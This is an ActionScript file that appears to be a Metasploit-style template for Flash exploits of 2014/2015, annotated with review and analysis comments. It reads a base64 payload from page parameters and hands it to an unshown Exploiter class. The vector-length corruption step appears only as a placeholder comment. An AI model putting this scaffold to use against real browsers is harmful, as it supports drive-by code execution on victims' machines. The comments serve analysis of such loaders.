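/*
 * Code to assist the creation of exploits for the trend of Flash
 * vulnerabilities used in the wild during 2014/2015. It uses some ideas and
 * code included in @hdarwin89's proofs of concept.
 *
 * How to build:
 *   1. Download the AIRSDK, and use its compiler.
 *   2. Download the Flex SDK (4.6).
 *   3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder
 *      (/framework/libs): all of them, including subfolders, especially mx,
 *      which is necessary for the Base64Decoder.
 *   4. Build with: mxmlc -o msf.swf Exploit.as
 */
package
{
    import flash.display.LoaderInfo
    import flash.display.Sprite
    import flash.utils.ByteArray
    import mx.utils.Base64Decoder

    /**
     * Entry sprite of the template.
     *
     * The constructor reads two loader parameters (FlashVars / query string),
     * base64-decodes one of them into a ByteArray, and hands everything to
     * Exploiter, which is defined elsewhere in the project and not shown here.
     *
     * Analysis note: the payload is not embedded in the SWF. It arrives in
     * the `sh` parameter supplied by the embedding page or URL, so it has to
     * be recovered from the HTML or a network capture, not from the SWF alone.
     * Reading `pl` and `sh` and base64-decoding `sh` at start-up is the
     * recognisable shape of this loader.
     */
    public class Exploit extends Sprite
    {
        // NOTE(review): the listing shows a bare "Vector." here, which does
        // not compile; the type parameter looks lost in extraction. <uint> is
        // presumed. Confirm against the Exploiter constructor signature.
        // This field is never assigned in this file (see the placeholder in
        // the constructor), so as written it is null when passed on.
        private var uv:Vector.<uint>
        private var b64:Base64Decoder = new Base64Decoder()
        private var payload:ByteArray
        private var platform:String
        private var exploiter:Exploiter

        /**
         * Reads the `pl` and `sh` loader parameters, decodes `sh` from base64
         * into `payload`, and constructs the Exploiter.
         *
         * Neither parameter is validated. If `sh` is absent, b64_payload is
         * null and the replace() call below throws.
         */
        public function Exploit()
        {
            var params:Object = LoaderInfo(this.root.loaderInfo).parameters

            // Platform string, forwarded unmodified to Exploiter.
            platform = params.pl

            // Base64 text of the payload. Every space is turned back into '+',
            // presumably because '+' is decoded to a space when the value
            // travels URL-encoded; only the substitution is visible here.
            var b64_payload:String = params.sh
            var pattern:RegExp = / /g;
            b64_payload = b64_payload.replace(pattern, "+")

            b64.decode(b64_payload)
            payload = b64.toByteArray()

            /*
                The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
            */

            // NOTE(review): the meaning of 0x13e is not visible in this file;
            // confirm against Exploiter's constructor.
            exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
        }
    }
}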